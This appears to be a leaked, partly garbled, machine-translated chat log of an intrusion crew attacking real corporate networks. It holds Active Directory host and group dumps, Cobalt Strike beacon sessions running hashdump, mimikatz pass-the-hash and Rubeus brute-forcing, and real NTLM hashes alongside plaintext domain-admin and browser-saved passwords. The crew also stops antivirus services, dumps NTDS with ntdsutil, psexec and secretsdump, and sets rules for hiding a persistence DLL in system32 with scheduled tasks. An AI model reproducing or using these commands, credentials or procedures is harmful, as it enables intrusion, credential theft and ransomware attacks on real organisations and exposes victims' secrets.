SFE19195.corp.televisa.com.mx
SFE14487.corp.televisa.com.mx
SFE14491.corp.televisa.com.mx
SFE14714.corp.televisa.com.mx
SFE22582.corp.televisa.com.mx
SFE22767.corp.televisa.com.mx
SFE20792.corp.televisa.com.mx
CORPKLHLMHAPT.corp.televisa.com.mx
SFE22807.corp.televisa.com.mx
Digital-09.corp.televisa.com.mx
CORPKLHLRSAPT.corp.televisa.com.mx
CORPKLHLATAP1T.corp.televisa.com.mx
CORPKLHLATAP2T.corp.televisa.com.mx
SFE17796.corp.televisa.com.mx
SFCITRIXPROV1.corp.televisa.com.mx
CORPKLHLRSAP2P.corp.televisa.com.mx
CORPKLHLRSAPU.corp.televisa.com.mx
CORPKLHLRSAP1P.corp.televisa.com.mx
CORPKLHLATAP4P.corp.televisa.com.mx
SFCITRIXAPUAT2.corp.televisa.com.mx
CORPKLHLATAP2P.corp.televisa.com.mx
SFCITRIXSFRONT1.corp.televisa.com.mx
SFCITRIXSQLMR1.corp.televisa.com.mx
SFCITRIXSQLMR2.corp.televisa.com.mx
SFCITRIXPRDRS.corp.televisa.com.mx
QROCITRIXSQLMR1.corp.televisa.com.mx
SFCITRIXPRDATS.corp.televisa.com.mx
QROCTIXAPLAN1.corp.televisa.com.mx
CORPKLHLATAP1U.corp.televisa.com.mx
SFCITRIXSQLMR3.corp.televisa.com.mx
SFCTXPRFM1.corp.televisa.com.mx
CORPKLHLATAP5P.corp.televisa.com.mx
QROCTXPROV1.corp.televisa.com.mx
CORPKLHLATAP2U.corp.televisa.com.mx
QROCTXPRFM1.corp.televisa.com.mx
QROCTXSTFRONT1.corp.televisa.com.mx
CORPKLHLATAP1P.corp.televisa.com.mx
SFCITRIXPROV2.corp.televisa.com.mx
SFCITRIXSFRONT2.corp.televisa.com.mx
SFCITRIXCLCONN1.corp.televisa.com.mx
CORPKLHLATAP3P.corp.televisa.com.mx
SFCTXPRFM2.corp.televisa.com.mx
CORPSFECOD003.corp.televisa.com.mx
CORPSFECOD002.corp.televisa.com.mx
CORPSFECOD001.corp.televisa.com.mx
TVSACHALTVC03.corp.televisa.com.mx
CORPSFEBDP119.corp.televisa.com.mx
xchange01.corp.televisa.com.mx
CORPSFEBDQA02.corp.televisa.com.mx
ORPRAP002.corp.televisa.com.mx
ORPRAP008.corp.televisa.com.mx
ORQASRV001.corp.televisa.com.mx
ORDVAP005.corp.televisa.com.mx
ORPRAP005.corp.televisa.com.mx
ORDEVSRV001.corp.televisa.com.mx
ORPRAP003.corp.televisa.com.mx
ORPRWB002.corp.televisa.com.mx
ORPRWB001.corp.televisa.com.mx
ORDVAP004.corp.televisa.com.mx
CORPSFEAPLP224.corp.televisa.com.mx
instance-202001.corp.televisa.com.mx
ORQAAP008.corp.televisa.com.mx
ORQAAP007.corp.televisa.com.mx
ORDVAP002.corp.televisa.com.mx
ORPRAP004.corp.televisa.com.mx
ORDVAP001.corp.televisa.com.mx
CORPSFEBDP140.corp.televisa.com.mx


CN=reto-admin
SFE22614.corp.televisa.com.mx

CN=Admin_Wintel
CORPKIOBZT02_C1.corp.televisa.com.mx
CORPSFEWEB07.corp.televisa.com.mx
corpkiodb08.corp.televisa.com.mx
corpkioapp05.corp.televisa.com.mx
CORPSFEWEB09.corp.televisa.com.mx
CORPSFECOD003.corp.televisa.com.mx
CORPSFECOD002.corp.televisa.com.mx
CORPSFECOD001.corp.televisa.com.mx
TVSACHALTVC03.corp.televisa.com.mx
CORPSFEBDP119.corp.televisa.com.mx
xchange01.corp.televisa.com.mx
CORPSFEBDQA02.corp.televisa.com.mx
ORPRAP002.corp.televisa.com.mx
ORPRAP008.corp.televisa.com.mx
ORQASRV001.corp.televisa.com.mx
ORDVAP005.corp.televisa.com.mx
ORPRAP005.corp.televisa.com.mx
ORDEVSRV001.corp.televisa.com.mx
ORPRAP003.corp.televisa.com.mx
ORPRWB002.corp.televisa.com.mx
ORPRWB001.corp.televisa.com.mx
ORDVAP004.corp.televisa.com.mx
CORPSFEAPLP224.corp.televisa.com.mx
instance-202001.corp.televisa.com.mx
ORQAAP008.corp.televisa.com.mx
ORQAAP007.corp.televisa.com.mx
ORDVAP002.corp.televisa.com.mx
ORPRAP004.corp.televisa.com.mx
ORDVAP001.corp.televisa.com.mx
CORPSFEBDP140.corp.televisa.com.mx


CN=ISA Administracion Wintel aka CN=Admin_Wintel aka CN=Servidores Administrados Wintel Parametros PW CORP
CORPKIOBZT02_C1.corp.televisa.com.mx
CORPSFEWEB07.corp.televisa.com.mx
corpkiodb08.corp.televisa.com.mx
corpkioapp05.corp.televisa.com.mx
CORPSFEWEB09.corp.televisa.com.mx
CORPSFECOD003.corp.televisa.com.mx
CORPSFECOD002.corp.televisa.com.mx
CORPSFECOD001.corp.televisa.com.mx
TVSACHALTVC03.corp.televisa.com.mx
CORPSFEBDP119.corp.televisa.com.mx
xchange01.corp.televisa.com.mx
CORPSFEBDQA02.corp.televisa.com.mx
ORPRAP002.corp.televisa.com.mx
ORPRAP008.corp.televisa.com.mx
ORQASRV001.corp.televisa.com.mx
ORDVAP005.corp.televisa.com.mx
ORPRAP005.corp.televisa.com.mx
ORDEVSRV001.corp.televisa.com.mx
ORPRAP003.corp.televisa.com.mx
ORPRWB002.corp.televisa.com.mx
ORPRWB001.corp.televisa.com.mx
ORDVAP004.corp.televisa.com.mx
CORPSFEAPLP224.corp.televisa.com.mx
instance-202001.corp.televisa.com.mx
ORQAAP008.corp.televisa.com.mx
ORQAAP007.corp.televisa.com.mx
ORDVAP002.corp.televisa.com.mx
ORPRAP004.corp.televisa.com.mx
ORDVAP001.corp.televisa.com.mx
CORPSFEBDP140.corp.televisa.com.mx
``memberOf: CN=ISA Full Access users in the group have full access either to cyctrics or to vnp look at adjacent groups in the found pksopopods and so ongety getovy not program code``.
>memberOf: CN=PKIEnrollGP,OU=PKI Enroll,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=reto-admin,CN=Users,DC=corp,DC=televisa,DC=com,DC=mx
>dNSHostName: SFE22614.corp.televisa.com.mx
```
all that showed from `reto-admin````
>memberOf: CN=ISA Administracion Wintel,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
``All PCs from these groups''.
>memberOf: CN=ISA Full Access,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=adminvirt,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=reto-admin,CN=Users,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Admin_Wintel,OU=Users,OU=HP Wintel,DC=corp,DC=televisa,DC=com,DC=mx
``These are the admins''.
>memberOf: CN=Admin_Wintel,OU=Users,OU=HP Wintel,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Servicio Basico,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Internet2 H-Q,OU=Grupos Locales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=impresoras_santafe,CN=Users,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=PKITelevisaUserWireless,OU=PKI Enroll,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=reto-admin,CN=Users,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=adminvirt,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=SCVMMHPUsers,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=ISA Accesos Unicos,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=ISA Full Access,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>sAMAccountName: jajimenezar
```
```
>memberOf: CN=IMP-CORP,OU=Servicio_Impresion,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Admin_Wintel,OU=Users,OU=HP Wintel,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Print_Lanier,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Servicio Basico,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=PKITelevisaUserWireless,OU=PKI Enroll,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Wintel,OU=Users,OU=HP Wintel,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=reto-admin,CN=Users,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=ISA Administracion Wintel,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=User_PSO,OU=Grupos PSOs,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=adminvirt,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=ISA Accesos Unicos,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=ISA Full Access,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Internet3,OU=Grupos Locales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>sAMAccountName: manhernandez
```
```
>memberOf: CN=IMP-CORP,OU=Servicio_Impresion,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Admin_Wintel,OU=Users,OU=HP Wintel,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Servicio Basico,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=impresoras_santafe,CN=Users,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=CORPSFEAPP05_READ,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=PKITelevisaUserWireless,OU=PKI Enroll,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=reto-admin,CN=Users,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=ISA Administracion Wintel,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=User_PSO,OU=Grupos PSOs,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=adminvirt,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=ISA Full Access,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Internet3,OU=Grupos Locales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>sAMAccountName: ldguzmanj
```
```
>memberOf: CN=IMP-CORP,OU=Servicio_Impresion,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Admin_Wintel,OU=Users,OU=HP Wintel,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=impresoras_santafe,CN=Users,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=PKITelevisaUserWireless,OU=PKI Enroll,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Wintel,OU=Users,OU=HP Wintel,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Servicio Medio,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=reto-admin,CN=Users,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=ISA Administracion Wintel,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Servicio Personal IT,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=adminvirt,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=SCVMMHPUsers,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=ISA Full Access,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Internet3,OU=Grupos Locales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=STAFE_m_PSO,OU=STAFE_m-m,OU=Password,DC=corp,DC=televisa,DC=com,DC=mx
>sAMAccountName: mgmayetg
``each user you have a password from[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=JDGNJWsKSwif4Rtxi) each admin can?one message plus all the bundles are falling off each userf me so all deaf in general have moved a little further into the trasttoche all the cars where they can go check the cars 4 admins what do you have? but in the near future waiting for the farm for kerbs)not yet information or under php on the wind) anyone searched for oracle?I would generally make an emphasis on services that are used in the networks, in addition to those that have passed lpe and can look for modules so if we do not have time for weekdays we will have busy weekends we need for a week at least 3 networks to close completely in the Mon will come new sessions sleep and rest next week will be difficult, right?i hope it's Saturday-Saturday = weekend:thumbsup:let's go homeDa@tl1supportedrubbit really fall asleep at the keyboard go home already? for domain accounts can not be so passes may be different (i think so)he is listed as yes but he and LAa is not he so``?
Result：
Not Found, it is being cracked by our background system.
Please wait up to 5 days. A notification email will be sent to you when it is cracked successful , otherwise it is cracked failure.
``Checked@user7`STAKC.local\sysadmin ff928c9f7bce0d834658c1436381494e``[ ](https://mediaeveryone.com/channel/general?msg=yBPXxCfaa9nF87Rzh) in which grid? Objects gettrunda have you checked the users by group? almost 2120659 Objects gettrunda and not 30aOn the second network (mine) only 20+ pk in #snpartners-coma we have 30k pk in the network yes? well there on some cars LA are domain users more, LA only hashclir LA?those hashes as I understood not valid and LA we do not have? and only he alone on the key machines, and on other machines he goes through the local admin only 1 DA without a krede not go anywhere, got all the possible from those machines on which the ducked second network?here yes it's been a week without a declarationuffhough to one yes it's practice so droptestani)) did not try this "childproof" special when the POC is not completely usable* correct only if you're going to use POC directly from githab which does not contribute to it myself yet, if you can - share how you started) try it;- )you can to @tl1 =)))) on the working machines do not need to keep anything other than the "client" application, it is not a correct step to take them, it is better to have a separate VPS remote for thatspaskPack5156the same as wasminutka@tl1 have the ability to recognize the password ?
```
 * Username : Linux
 * Domain : PKGPROD
 * NTLM : c40ce4eab245d09bead615fd67e59a77
 * SHA1 : b6fc4dbe67cd7fcc4278a842803c0ff294098f57
 * DPAPI : b4172b5b7931728b8f4abb6a6f85b2f2
``Which service to stop?
SERVICE_NAME: macmnsvc
DISPLAY_NAME: McAfee Agent Common Services
        TYPE : 10 WIN32_OWN_PROCESS
        STATE : 4 RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE : 0 (0x0)
        SERVICE_EXIT_CODE : 0 (0x0)
        CHECKPOINT : 0x0
        WAIT_HINT : 0x0

SERVICE_NAME: masvc
DISPLAY_NAME: McAfee Agent Service
        TYPE : 10 WIN32_OWN_PROCESS
        STATE : 4 RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN)
        WIN32_EXIT_CODE : 0 (0x0)
        SERVICE_EXIT_CODE : 0 (0x0)
        CHECKPOINT : 0x0
        WAIT_HINT : 0x0

SERVICE_NAME: McAfeeFramework
DISPLAY_NAME: McAfee Agent Backwards Compatibility Service
        TYPE : 10 WIN32_OWN_PROCESS
        STATE : 4 RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE : 0 (0x0)
        SERVICE_EXIT_CODE : 0 (0x0)
        CHECKPOINT : 0x0
        WAIT_HINT : 0x0

SERVICE_NAME: mfemms
DISPLAY_NAME: McAfee Service Controller
        TYPE : 10 WIN32_OWN_PROCESS
        STATE : 4 RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE : 0 (0x0)
        SERVICE_EXIT_CODE : 0 (0x0)
        CHECKPOINT : 0x0
        WAIT_HINT : 0x0

SERVICE_NAME: mfevtp
DISPLAY_NAME: McAfee Validation Trust Protection Service
        TYPE : 10 WIN32_OWN_PROCESS
        STATE : 4 RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE : 0 (0x0)
        SERVICE_EXIT_CODE : 0 (0x0)
        CHECKPOINT : 0x0
        WAIT_HINT : 0x0

SERVICE_NAME: mfewc
DISPLAY_NAME: McAfee Endpoint Security Web Control Service
        TYPE : 10 WIN32_OWN_PROCESS
        STATE : 4 RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE : 0 (0x0)
        SERVICE_EXIT_CODE : 0 (0x0)
        CHECKPOINT : 0x0
        WAIT_HINT : 0x0

``````
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82501 bytes
[+] received password hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
User:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:b3b0692c09bb03d1e67fae2a98952a2f:::
``and where is the hashdumpdown result of the system? Most likely the av is fighting to run this utility``.
beacon> shell net localgroup Administrators
[*] Tasked beacon to run: net localgroup Administrators
[+] host called home, sent: 60 bytes
[+] received output:
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
PKGPROD\Domain Admins
PKGPROD\jess
User
The command completed successfully.

``Local admins what?'' passwords don't match
```
beacon> execute-assembly Rubeus.exe brute /users:C:\ProgramData\user.txt /password:C:\ProgramData\pass.txt /dc:2K12SERVER
[*] Tasked beacon to run .NET program: Rubeus.exe brute /users:C:\ProgramData\user.txt /password:C:\ProgramData\pass.txt /dc:2K12SERVER
[+] host called home, sent: 320213 bytes
[+] received output:

   ______ _
  (_____ \ | |
   _____) )_ _| |__ _____ _ _ ___
  | __ /| | | | _ \| ___ | | | |/___)
  | | \ \| |_| | |_) ) ____| |_| |___ |
  |_| |_|____/|____/|_____)____/(___/

  v1.5.0

[+] Valid user => Administrator
[+] Valid user => linux
[+] Valid user => micro
[+] Valid user => micro2
[+] Valid user => mtsi
[+] Valid user => PAC
[+] Valid user => srivera
[+] Valid user => timesavers

[-] Done: No credentials were discovered :'(

Wrong. It's okay.
User name jess
Full Name jess
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 8/23/2019 1:08:43 PM
Password expires Never
Password changeable 8/24/2019 1:08:43 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 9/21/2020 9:55:17 AM

Logon hours allowed All

Local Group Memberships
Global Group memberships *CatalogAccess *SalesAccess
                             *InventoryAccess *Domain Users
The command completed successfully.

``So wait, about Jess we're talking about hash has not changed, if the password has not changed the other thing set? ``Password changeable 6/13/2014 11:20:21 AM ``A password changed the logon 7/16/2020 2:06:23 PM ``Check if you changed ``net user ``a1fd693cdc0a22a5abede17e517df308 ``Where did Jess have a new hash ?

```
Authentication Id : 1 ; 467262273 (00000001:1bd9db41)
Session : NewCredentials from 2
User Name : jess
Domain : PKGPROD
Logon Server : (null)
Logon Time : 9/21/2020 9:00:27 AM
SID : S-1-5-21-4059064934-1889560214-2984304678-1162
	msv :
	 [00000003] Primary
	 * Username : jess
	 * Domain : PKGPROD
	 * NTLM : a1fd693cdc0a22a5abede17e517df308
	 * SHA1 : 490a64b492e39b2f40fcfc2472b702b619feab5e
	 * DPAPI : 8e5b8c5beefe8319c0865ea259ad40af
``I think I'm doing something wrong.
```
beacon> mimikatz sekurlsa::pth /user:Linux /domain:PKGPROD /ntlm:c40ce4eab245d09bead615fd67e59a77 /run "net use * "\\192.168.168.10\C$" /persistent:no"
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:Linux /domain:PKGPROD /ntlm:c40ce4eab245d09bead615fd67e59a77 /run "net use * "\\192.168.168.10\C$" /persistent:no" command
[+] host called home, sent: 706119 bytes
[+] received output:
user : Linux
domain : PKGPROD
program : cmd.exe
impers. : no
NTLM : c40ce4eab245d09bead615fd67e59a77
  | PID 33388
  | TID 35340
  | LSA Process is now R/W
  | LUID 1 ; 1028986815 (00000001:3d5517bf)
  \_ msv1_0 - data copy @ 000001FA427FBC20 : OK !
  \kerberos - data copy @ 000001FA41E5A6A8
   \_ aes256_hmac -> null
   \_ aes128_hmac -> null
   \_ rc4_hmac_nt OK
   \_ rc4_hmac_old OK
   \_ rc4_md4 OK
   \_ rc4_hmac_nt_exp OK
   \_ rc4_hmac_old_exp OK
   \_ *Password replace @ 000001FA41DB24E8 (32) -> null
``Checked this password with other domain admins?
--- Chromium Credential (User: jess) ---
URL : https://cw.shipandsave.com/
Username : PKGPROD@ASCENTGL.COM
Password : RATER100

--- Chromium Credential (User: jess) ---
URL : https://rrts.mercurygate.net/
Username : PKGPRODUCTS@ASCENTGL.COM
Password : RATER100

--- Chromium Credential (User: jess) ---
URL : https://workforcenow.adp.com/
Username : Jessikinha777.
Password :

Just in case: don't forget to remove Linux from the brutadata list, let's go the usual way
we have a pass with a single YES
check other domain admins for this password check how many attempts on this username's wrong password, I didn't get it +@user5 in your team? You guys are nearby, don't you communicate?) I thought I was the only one who wouldn't use it, but everyone did
user2-2 beacon> shell net use * "\192.168.168.10\C$" /persistent:no /user:PKGPROD\Linux Pack5156
[*] Tasked beacon to run: net use * "\\192.168.168.10\C$" /persistent:no /user:PKGPROD\Linux Pack5156
[+] host called home, sent: 106 bytes
[+] host called home, sent: 19 bytes
[+] received output:
System error 86 has occurred.

The specified network password is not correct.

You still have about two more tries to try if it doesn't fit, it will break the account)
user2-3 beacon> shell net use G: \192.168.168.15\C$\temp /user:PKGPROD\Linux Pack5156
[*] Tasked beacon to run: net use G: \192.168.168.15\C$\temp /user:PKGPROD\Linux Pack5156
[+] host called home, sent: 95 bytes
[+] received output:
System error 86 has occurred.

The specified network password is not correct.


user2-3 beacon> shell net use G: \192.168.168.66\C$\temp /user:PKGPROD\Linux Pack5156
[*] Tasked beacon to run: net use G: \192.168.168.66\C$\temp /user:PKGPROD\Linux Pack5156
[+] host called home, sent: 95 bytes
[+] received output:
System error 86 has occurred.

The specified network password is not correct.


user2-3 beacon> shell net use G: \192.168.168.66\C$\temp /user:PKGPROD\jess Payables5150
[*] Tasked beacon to run: net use G: \192.168.168.66\C$\temp /user:PKGPROD\jess Payables5150
[+] host called home, sent: 98 bytes
[+] received output:
System error 86 has occurred.

The specified network password is not correct.


``Does anyone read the conclusion?

user2-3 beacon> shell net use G: \192.168.168.66\C$\temp /user:PKGPROD\jess Payables5150
[*] Tasked beacon to run: net use G: \192.168.168.66\C$\temp /user:PKGPROD\jess Payables5150
[+] host called home, sent: 98 bytes
[+] received output:
System error 86 has occurred.

The specified network password is not correct.

``The pole is fine and there was no foul play on his part because
```
Last logon 7/16/2020 2:06:23 PM
``lol)he just didn't press ``rev2self``@user7 try net use with the YES creds on dcwhy do you get different output from the same command?
beacon> shell net user Linux /dom
[*] Tasked beacon to run: net user Linux /dom
[+] host called home, sent: 50 bytes
[+] received output:
The request will be processed at a domain controller for domain pkgprod.local.

User name linux
Full Name Linux
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 6/12/2014 11:20:21 AM
Password expires Never
Password changeable 6/13/2014 11:20:21 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 7/16/2020 2:06:23 PM

Logon hours allowed All

Local Group Memberships *Administrators
Global Group memberships *Group Policy Creator *Domain Admins
                             *Enterprise Admins *Domain Users
                             *Schema Admins
The command completed successfully.

```shell net user Linux /dom have a problem with the session on the dk? Yes, I see, I didn't notice)`` It's written there, but thank you)``
kerberos :
	 * Username : Linux
	 * Domain : PKGPROD
	 * Password : Pack5156
the question is why is it better to hurry up the question is why YES came, mb anomalous activity and will reboot yes, it is better to jump to DK first? then dump the NTDSlol)and from where? which way? got the password from YES
```
Authentication Id : 0 ; 680664956 (00000000:28921f7c)
Session : NewCredentials from 2
User Name : jess
Domain : PKGPROD
Logon Server : (null)
Logon Time : 9/18/2020 9:26:21 AM
SID : S-1-5-21-4059064934-1889560214-2984304678-1162
	msv :
	 [00000003] Primary
	 * Username : Linux
	 * Domain : PKGPROD
	 * NTLM : c40ce4eab245d09bead615fd67e59a77
	 * SHA1 : b6fc4dbe67cd7fcc4278a842803c0ff294098f57
	 * DPAPI : b4172b5b7931728b8f4abb6a6f85b2f2
	tspkg :
	wdigest :
	 * Username : Linux
	 * Domain : PKGPROD
	 * Password : (null)
	kerberos :
	 * Username : Linux
	 * Domain : PKGPROD
	 * Password : Pack5156
	ssp :
	credman :
```user5eyJhbGciOiJBOLKn5HkwYoFsCllZfCY8Pj8Hy6Ek1aGc3jfZXmCyG73z/MbN9vE2mtKpRwB9HTGL/MQ6S/oMuUTorln8DIPJ5G3ckk1EJn1UrT7F7p0hD19O5wbYO9EIcNK9ebSeU62v0CkgxU3bzVmxgG6b9822+tgYexOJrCdWh8rMS192GXegVuWVujOeT9ZP8q5p+zZlGLQ2IpbcYw7daBWhqlgdBw==вы don't pull servers in coba before closing@user4 coba in ls@user3 to @user8 for nowGood day everyone:space_invader:helloHello again fell offtoday until what time?@user1 to #snpartners-com please.Yes nowhere? and the spns themselves, too, it seems like something you can chek too. Yesterday I read something about it yes, there is a skul server, in powerupsql it says that you need to specify [machine]/instanseName...talk about spns? There is a thought to poke the skul, but do not know how to know the name of the instance of the subject? or to test from the msfa there is a sense to look for additional modules all patched not on attack but on scan YES not taken? The day before yesterday changed passwords, deleted unnecessary YES. Nashuemel maybe why were burned? groups can write through #stanthonyskc-com more `stanthonyskc.com`STAKC in the works, but there we are probably spalichto us in the workspanki hoihiPrievest who?
7dfa0531d73101ca080c7379a9bff1c7 P@ssw0rd123!
62e68029812e6498197aaa32824c183e P1v0t@l
25228f174278a82e7202a25df2d9923b Operator2010

``Dump these hashes
```
7dfa0531d73101ca080c7379a9bff1c7
62e68029812e6498197aaa32824c183e
25228f174278a82e7202a25df2d9923b
``like a strange dc in the UK domain
I dumped his sysinfo into toolspanel
the new dll crashes there as well, but it doesn't show up on the AB ``
>dNSHostName: DCWAS45.Wilsonart.com
>description: Symantec End Point Management Server
 
Ping statistics for 170.7.76.245:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: FLWAS03.Wilsonart.com
>description: PROD Symantec AntiVirus Management Server
 
Ping statistics for 170.7.20.198:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss)
I'm coming to the group in the TV, if anything Deb[ ](https://mediaeveryone.com/group/wilsonart-com?msg=GYkZN2djRqCXM8dDY) who did not come? we group created by the boss and added depa there. and now he does not respond there I sent you two times have you written to depa?in shelter, there's nothing to gather (we need to solve something with dll - simantik chopped, so we can not get through to about 4 or 6 other domains (only 4 domains want to get through))) today do not want to close? how are you doing?
it's in cmd /c they're next to each other, it makes no sense i've tried it that way
```
remote-exec psexec 170.7.76.170 cmd /c C:\Windows\Temp\7za a ntds-eu.7z C:\Windows\Temp\ntds
``No one knows what's wrong? [ ](https://mediaeveryone.com/group/wilsonart-com?msg=KWRNtkPsgfdHoqWgC) paths are relative. ``French2014, please send me more of this hash.
```
fd20144890966cfb2300ec6629249cab
``````

pip install impacket
pip install pycrypto
pip install pyasn1
apt-get install python-dev

all files are placed in the same folder together with the script, there will be 4

secretsdump.py -ntds ntds.dit -system SYSTEM -outputfile result local
``Where is the error here?
remote-exec psexec 170.7.76.170 cmd /c C:\Windows\Temp\7za a ntds-eu.7z ntds
ntds-eu 7z ntds also bypassed no, haven't tried that.I mean the load on port 80 in the coboo is absent on port 80 have you tried that? -and bind by psexec through normal psexec ?neither in coboo nor in msf doesn't fly through[ ](https://mediaeveryone.com/group/wilsonart-com?msg=fCNHA6TDppNxAceio) would be so easy.in that domain 80% of the servers on 2003)and whatever 2003 just hashdump make dc on 2003? I don't think so.ntdsutil
ntdsutil "ac in ntds" "ifm" "cr fu C:\windows\Temp\ntds" q q
```
did it ever work on 2003? ``Dell@2020````
4bcba61efb7ce5e848ec339394829572
```
@tl1 throw in the Kmd5 unpacked
ukwadc01.uk.wilsonart.com [170.7.70.214]
``answer - no it's not possible to mount dkprosto clarify if the question stood up @user9 a misunderstanding came upa forget it, I confused you didn't understand where dk todk in the group of crits servers)yes to him)ah, I thought you about the second domain)))
and the question was to @user8)well mount dk not need all the same mb... )I do not understand)well dk sees)external servers see? what edr?
HQTAS73.Wilsonart.com
DEVBIOBI.Wilsonart.com
``[ ](https://mediaeveryone.com/group/wilsonart-com?msg=LsGJ6Paosc8cpwbSS) well there is and there is, the main thing when you come inno place search for a place to run there are many where the folder yes there is if not then do not throw? for example, backup, veeam, production ... and also the server is not in the crits group of servers possible more rules to select the server under the percis on the server is started by the system and is run by the staff
masked in the folder system32
schtasks /query - check whether the stack was created after the execution (dll creates the stack after launching)
delete the task which was launched

Server is selected where there are no active YES and EA processes and where YES or EA have not visited for a long time
(check users folders for date of change)
the server does not belong to a crisis group of servers, for example, backup, veeam, production ... people responsible for the forum, then move there@user9 please describe here for all do not remember the rules will do? if you think I do not interfere) would give the go-ahead that remember would immediately throw another thing the rules we remember, so brainstorm the same
